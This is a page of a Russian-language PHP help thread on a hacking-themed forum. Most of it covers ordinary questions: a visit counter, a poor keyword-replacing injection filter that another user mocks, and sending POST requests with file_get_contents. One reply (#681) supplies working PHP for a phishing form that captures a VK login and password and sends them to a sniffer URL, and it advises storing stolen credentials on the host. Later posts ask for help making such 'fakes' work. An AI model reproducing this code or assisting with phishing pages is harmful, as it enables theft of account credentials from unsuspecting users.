Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Кодинг / Другие Языки / PHP
 
  Страница 46
  , 10:36   #676
Местный
 
Аватар для ksovrela0
 
Локация: Delphi,html,php,css,mysql
Регистрация: 31.01.2013
Сообщений: 202

Репутация: 52 / 1
По умолчанию

Ты предлагаешь после каждой страницы делать редирект на эту страницу? Я мог бы взять js+ajax+jquery но сайт для телефонов и старенькие телефоны не думаю чтоб js понимали
 
Пользователь вне форума    
Наши Спонсоры
  , 14:52   #677
Местный
 
Аватар для ksovrela0
 
Локация: Delphi,html,php,css,mysql
Регистрация: 31.01.2013
Сообщений: 202

Репутация: 52 / 1
По умолчанию

Никто не знает ответа?
 
Пользователь вне форума    
  , 15:05   #678
Антихрист
 
Аватар для Suicide[VII]
 
Локация: Небытие
Регистрация: 15.04.2011
Сообщений: 398

Репутация: 49 / 1
По умолчанию

ksovrela0, покажи кусок этого кода.
__________________
Я хочу танцевать со своими демонами, в бессильном бреду .
Пользователь вне форума    
  , 20:33   #679
Постоянный
 
Аватар для rox@hak
 
Регистрация: 04.07.2010
Сообщений: 612

Репутация: 221 / 3
По умолчанию

у тебя вывод значения стоит перед записью посещения в базу
запрос на вывод делай после записи нового значения
сначала update
потом select
__________________
Огонь в глазах, это признак тлеющих опилок в голове!

Последний раз редактировалось rox@hak; 04.02.2016 в 20:35.
Пользователь вне форума    
  , 14:03   #680
Новичок
 
Регистрация: 20.02.2016
Сообщений: 1

Репутация: 0 / 0
По умолчанию

Здравствуйте.Короче такая проблемма.Я создал фейк-программу для взлома ВК.Все сделал как было показанно на видио, открываю для проверки.Ввожу любые числа, нажимаю активировать и открывается окошко с надписью
file_get_contents(httpzgif.?login:91848715|Password:12848715):failed to open stream:No such file of directory.Что делать?
 
Пользователь вне форума    
  , 16:36   #681
Новичок
 
Аватар для pizdohuyev
 
Регистрация: 25.02.2016
Сообщений: 13

Репутация: -1 / 0
По умолчанию

Цитата:
Сообщение от KING154 Посмотреть сообщение
Здравствуйте.Короче такая проблемма.Я создал фейк-программу для взлома ВК.Все сделал как было показанно на видио, открываю для проверки.Ввожу любые числа, нажимаю активировать и открывается окошко с надписью
file_get_contents(httpzgif.?login:91848715|Password:12848715):failed to open stream:No such file of directory.Что делать?
Потому что ему получать-то нечего через file_get_contents();.
Если будет примерно так:
PHP highlight
<?php
if(!empty($_POST['login') && !empty($_POST['password')){
$login htmlspecialchars(trim($_POST['login']));
$password htmlspecialchars(trim($_POST['password']));
$link 'http://domen.com/sniffer.php?data='.$login.'|'.$password;
file_get_contents($link);
}
?>
<form method="POST">
Логин: <input name="login" type="text"> Пароль: <input name="password" type="password">
</form>
То хоть как-то да будет работать, но лучше сохранять логины и пароли прямо на хостинге рядом с скриптом.
 

Последний раз редактировалось pizdohuyev; 27.02.2016 в 16:39.
Пользователь вне форума    
  , 10:28   #682
Новичок
 
Регистрация: 10.10.2012
Сообщений: 14

Репутация: -1 / 0
По умолчанию

Всем привет, пожалуйста подскажите есть ли вообще смысл от этой функции ? или это бред.
code:
// Функция защиты safes, меняет слова на не рабочие 
// Например select изменится на selеct где после sel русская буква е
function safes($zs)
{
$zs = preg_replace('/select/i',"selесt",$zs);
$zs = preg_replace('/delete/i',"delеtе",$zs);
$zs = preg_replace('/update/i',"uрdаtе",$zs);
$zs = preg_replace('/where/i',"whеrе",$zs);
$zs = preg_replace('/hex/i',"hех",$zs);
$zs = preg_replace('/0x/i',"",$zs);
$zs = preg_replace('/load_file/i',"lоаd_filе",$zs);
return $zs;
}

// Пропускаем глобальные массивы через функцию safes
$_POST=safes($_POST);
$_GET=safes($_GET);
$_SERVER=safes($_SERVER);
$_REQUEST=safes($_REQUEST);
$_COOKIE=safes($_COOKIE);
Автор не Я нашел ее еще в 2010 году в каком то сценарии, в принципе функция рабочая
например мойсайт.ру/index.php?страница=delete станет не рабочей потому как delete станет del русcкая е te
Есть ли вообще смысл использовать эту функцию на обычном сайте с пхп и базой данных ??? как маленькую защиту.
Я что спрашиваю, я просто ее не где больше не встречал может быть она вообще бесполезная ???
 

Последний раз редактировалось dron555; 18.06.2016 в 19:34.
Пользователь вне форума    
  , 19:05   #683
Грррр!
 
Аватар для _Werewolf_
 
Локация: upd://192.168.255.255
Регистрация: 28.06.2011
Сообщений: 3,296

Репутация: 294 / 5
По умолчанию

dron555,
Это настолько плохой подход к "защите", что я даже сохраню себе это как эталон идиотизма.
Это уже не в ногу себе стрелять, а сразу в голову всем, кто отвечает за разработку сайта.
Никогда не используйте этот подход!
__________________
Жили были Ох и Ах. Все им было пох и нах...
Хорошие люди принесут вам счастье, плохие люди наградят вас опытом, худшие – дадут вам урок, а лучшие – подарят воспоминания. Цените каждого.
Пользователь вне форума    
  , 06:11   #684
Новичок
 
Регистрация: 10.10.2012
Сообщений: 14

Репутация: -1 / 0
По умолчанию

_Werewolf_
Спасибо за ответ Я тоже думаю что это идиотизм!
У меня еще просто не много опыта, создаю сайты только для себя как хобби.

Про защиту сайта я не много знаю:
Знаю как настроить .htaccess
Пропускать вводимые данные через фильтры
если целое число использовать Integer
если текст убирать html и другие символы
Делать различные проверки и так далее

Просто данный код не где в скриптов больше не встречал (кроме того откуда я его вытащил) по этому и спросил.
Еще раз спасибо за ответ.
 

Последний раз редактировалось dron555; 27.06.2016 в 06:28.
Пользователь вне форума    
  , 17:47   #685
Новичок
 
Регистрация: 05.11.2016
Сообщений: 1

Репутация: 0 / 0
Unhappy Валидность входа

Народ подскажите пожалуйста. Как проверять вход фейка на валидность php а не программы. Я запутался...
 
Пользователь вне форума    
  , 20:58   #686
Новичок
 
Регистрация: 17.12.2012
Сообщений: 1

Репутация: 0 / 0
По умолчанию

Друзья помогите решить вопрос с фейком. Не переходит по указанной ссылке. ЗАЩИЩЁННОЕ СОЕДИНЕНИЕ! Как исправить?
 
Пользователь вне форума    
  , 10:41   #687
Новичок
 
Регистрация: 29.05.2017
Сообщений: 2

Репутация: 0 / 0
По умолчанию

Как на php отправить post запрос/ответ на сайт,без cURL или JS?
Только чистый php и html.
Я в этом деле новичек просто.Только недавно начал учить php.
 
Пользователь вне форума    
  , 12:26   #688
Антихрист
 
Аватар для Suicide[VII]
 
Локация: Небытие
Регистрация: 15.04.2011
Сообщений: 398

Репутация: 49 / 1
По умолчанию

Цитата:
Сообщение от alex0n Посмотреть сообщение
Как на php отправить post запрос/ответ на сайт,без cURL или JS?
Только чистый php и html.
Я в этом деле новичек просто.Только недавно начал учить php.
Через file_get_contents();

PHP highlight
$sURL "https://site.com/test.php";  # POST URL
$sPD "name=Jacob&bench=150"# The POST Data
$aHTTP = array(
  
'http' => 
    array(
    
'method'  => 'POST',
    
'header'  => 'Content-type: application/x-www-form-urlencoded',
    
'content' => $sPD
  
)
);
$context stream_context_create($aHTTP);
$contents file_get_contents($sURLfalse$context);

echo 
$contents
__________________
Я хочу танцевать со своими демонами, в бессильном бреду .
Пользователь вне форума    
  , 20:43   #689
Новичок
 
Регистрация: 29.05.2017
Сообщений: 2

Репутация: 0 / 0
По умолчанию

code:
$sPD = "name=Jacob&bench=150"; # The POST Data
Разве это будет правильно?
Я думал,что нужно так:
code:
$sPD = array('name'=>'Jacob','bench'=>150);
Я конечно не утверждаю,что ваш метод не верен,просто он больше похож на GET.Или с post запросом так можно?
 
Пользователь вне форума    
  , 09:38   #690
Антихрист
 
Аватар для Suicide[VII]
 
Локация: Небытие
Регистрация: 15.04.2011
Сообщений: 398

Репутация: 49 / 1
По умолчанию

Цитата:
Сообщение от alex0n Посмотреть сообщение
code:
$sPD = "name=Jacob&bench=150"; # The POST Data
Разве это будет правильно?
Я думал,что нужно так:
code:
$sPD = array('name'=>'Jacob','bench'=>150);
Я конечно не утверждаю,что ваш метод не верен,просто он больше похож на GET.Или с post запросом так можно?
Конечно можно, сработают эти 2 варианта.

Но что бы твой вариант сработал нужна еще обертка http_build_query()
PHP highlight
$sPD http_build_query( array('name'=>'Jacob','bench'=>150)); 
Массив лишь как удобство, отправит он всеравно в исходном виде.

code:
$sPD = "name=Jacob&bench=150";
__________________
Я хочу танцевать со своими демонами, в бессильном бреду .
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом приложений ВКонтакте kir55rus Соц. сети 641 31.07.2014 15:39
[Photoshop] Задай вопрос - получи ответ M@ZAX@KEP Photoshop 13 14.10.2012 18:50
Сетевой этикет (Перед тем, как задать вопрос хакеру) Ram0nlord За чашечкой чая 6 21.05.2012 19:01
Поймал adware - способ борьбы Solomon_15 Windows 11 24.12.2010 14:14
Прежде чем задать вопрос!!! ALVP Новичкам 0 16.03.2009 19:58



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.